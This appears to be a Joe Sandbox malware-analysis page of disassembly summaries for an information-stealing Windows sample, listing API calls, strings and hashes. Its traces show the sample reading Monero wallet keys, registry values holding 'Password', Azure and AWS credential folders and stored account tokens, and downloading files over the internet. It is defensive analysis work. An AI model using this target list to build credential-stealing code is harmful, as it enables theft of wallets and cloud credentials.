Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: d584dba969c5ca6b07fb7349fecf62e4912ba13321379bda5af180786d24ca9a
Instruction ID: 1f7c4c7d48ac35af37101077ad435743bf9625f4cb8e1e0eb45ab87bb6347fc0
Opcode Fuzzy Hash: d584dba969c5ca6b07fb7349fecf62e4912ba13321379bda5af180786d24ca9a
Instruction Fuzzy Hash: 7541A1BA94020467DB10F770EC5BFED3A38BB64705F004595B689660C1EEB85BCD8BA2

Function 00541310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 005412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
Part of subcall function 005412A0: RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
Part of subcall function 005412A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 005412D7
Part of subcall function 005412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
Part of subcall function 005412A0: RegCloseKey.ADVAPI32(?), ref: 005412FF

lstrcat.KERNEL32(?,00000000), ref: 0054134F
lstrlen.KERNEL32(?), ref: 0054135C
lstrcat.KERNEL32(?,.keys), ref: 00541377

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,01279ED8,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01278970,?,\Monero\wallet.keys,00560E17), ref: 00558B86

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00541465

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A

DeleteFileA.KERNEL32(00000000), ref: 005414EF

Strings

\Monero\wallet.keys, xrefs: 0054138D
wallet_path, xrefs: 00541330
.keys, xrefs: 0054136B
SOFTWARE\monero-project\monero-core, xrefs: 00541335

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 996dacb16ea7d1221ba8ee13e09a32d95b8d7d5f462c7f7fa7772ac0b4e85884
Instruction ID: 4991db274e450fffeef09c61309ce7e432e38740ab555a8c8c8c6134c383b44b
Opcode Fuzzy Hash: 996dacb16ea7d1221ba8ee13e09a32d95b8d7d5f462c7f7fa7772ac0b4e85884
Instruction Fuzzy Hash: D45136B1D5011A57CB15FB60DDA6FED773CBF94301F404299B60A62081EE346B89CFA6

Function 00557500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00557542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0055757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557603
RtlAllocateHeap.NTDLL(00000000), ref: 0055760A
wsprintfA.USER32 ref: 00557640

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Strings

\, xrefs: 00557560
C, xrefs: 0055754C
:, xrefs: 0055755C
V, xrefs: 0055764D, 00557655, 0055761B, 00557623

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$V
API String ID: 1544550907-271220574
Opcode ID: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
Instruction ID: 871dd97918fa2740fbfea29058f5f3ac6086560c7843153b6e4e508ef4be1c59
Opcode Fuzzy Hash: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
Instruction Fuzzy Hash: CA4194B1D04248ABDF10DF94DC59BEEBBB8FF48701F10419AF90567280E7786A48CBA5

Function 005475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 005472D0: memset.MSVCRT ref: 00547314
Part of subcall function 005472D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0054733A
Part of subcall function 005472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
Part of subcall function 005472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
Part of subcall function 005472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
Part of subcall function 005472D0: HeapFree.KERNEL32(00000000), ref: 00547459

lstrcat.KERNEL32(35AAC020,005617FC), ref: 00547606
lstrcat.KERNEL32(35AAC020,00000000), ref: 00547648
lstrcat.KERNEL32(35AAC020, : ), ref: 0054765A
lstrcat.KERNEL32(35AAC020,00000000), ref: 0054768F
lstrcat.KERNEL32(35AAC020,00561804), ref: 005476A0
lstrcat.KERNEL32(35AAC020,00000000), ref: 005476D3
lstrcat.KERNEL32(35AAC020,00561808), ref: 005476ED
task.LIBCPMTD ref: 005476FB

Strings

: , xrefs: 0054764E

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
Instruction ID: 044deabaefb69752478f4a9cd8b8b0ef747b106a024b79909f6d9db1906845c1
Opcode Fuzzy Hash: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
Instruction Fuzzy Hash: 12318371A4010AEFDB04EBB4DC59DFF7B75FB88305B24810AF102A7251EB38A946CB65

Function 005472D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00547314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0054733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
HeapFree.KERNEL32(00000000), ref: 00547459
task.LIBCPMTD ref: 00547555

Strings

Password, xrefs: 00547401

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettask
String ID: Password
API String ID: 2808661185-3434357891
Opcode ID: 24ba2bea9ba16a8ee07ac987d098acf05121936016b5e0a8fa29ae64a50be244
Instruction ID: dfd562b83884cecb16fbd4e1631704645cd817438414521d642774f6791628f7
Opcode Fuzzy Hash: 24ba2bea9ba16a8ee07ac987d098acf05121936016b5e0a8fa29ae64a50be244
Instruction Fuzzy Hash: 9E613CB590426D9BDB24DB50CC45FEABBB8BF48304F0085E9E649A6141DBB05FC9CFA1

Function 00558100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0127D838,00000000,?,00560E2C,00000000,?,00000000), ref: 00558130
RtlAllocateHeap.NTDLL(00000000), ref: 00558137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00558158
__aulldiv.LIBCMT ref: 00558172
__aulldiv.LIBCMT ref: 00558180
wsprintfA.USER32 ref: 005581AC

Strings

%d MB, xrefs: 005581A3
@, xrefs: 0055814D

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 66776c86fd9d64b2b99acdc9d6571ba718b252245f3221c2208afdc0377d4914
Instruction ID: 3baf981012064c3505892516461b4277773cbd6ad6e3eb0abb3d9f34f52027b9
Opcode Fuzzy Hash: 66776c86fd9d64b2b99acdc9d6571ba718b252245f3221c2208afdc0377d4914
Instruction Fuzzy Hash: DC214FB1E44209ABEB10DFD4CC49FAFBB78FB44711F20450AF605BB280D77869058BA5

Function 005460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849

InternetOpenA.WININET(00560DF7,00000001,00000000,00000000,00000000), ref: 0054610F
StrCmpCA.SHLWAPI(?,0127E570), ref: 00546147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0054618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005461B3
InternetReadFile.WININET(?,?,00000400,?), ref: 005461DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0054620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00546249
InternetCloseHandle.WININET(?), ref: 00546253
InternetCloseHandle.WININET(00000000), ref: 00546260

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: b6f629ba3e812f2b6854ed073fd2b831a44b4b186b59e06c229783246916e587
Instruction ID: af584ca26c0e9cd2120ff875c94e8d6bb48393cec1f3a023caf0e4bef631a4e1
Opcode Fuzzy Hash: b6f629ba3e812f2b6854ed073fd2b831a44b4b186b59e06c229783246916e587
Instruction Fuzzy Hash: 035194B1940208BBEF20DF60DC49BEE7B78FB44705F108599B605A71C1DBB46A89CF96

Function 0054BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

lstrlen.KERNEL32(00000000), ref: 0054BC9F

Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0054BCCD
lstrlen.KERNEL32(00000000), ref: 0054BDA5
lstrlen.KERNEL32(00000000), ref: 0054BDB9

Strings

AccountId, xrefs: 0054BCC4
SELECT service, encrypted_token FROM token_service, xrefs: 0054BBEB
AccountTokens, xrefs: 0054BB49
AccountTokens, xrefs: 0054BABA

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
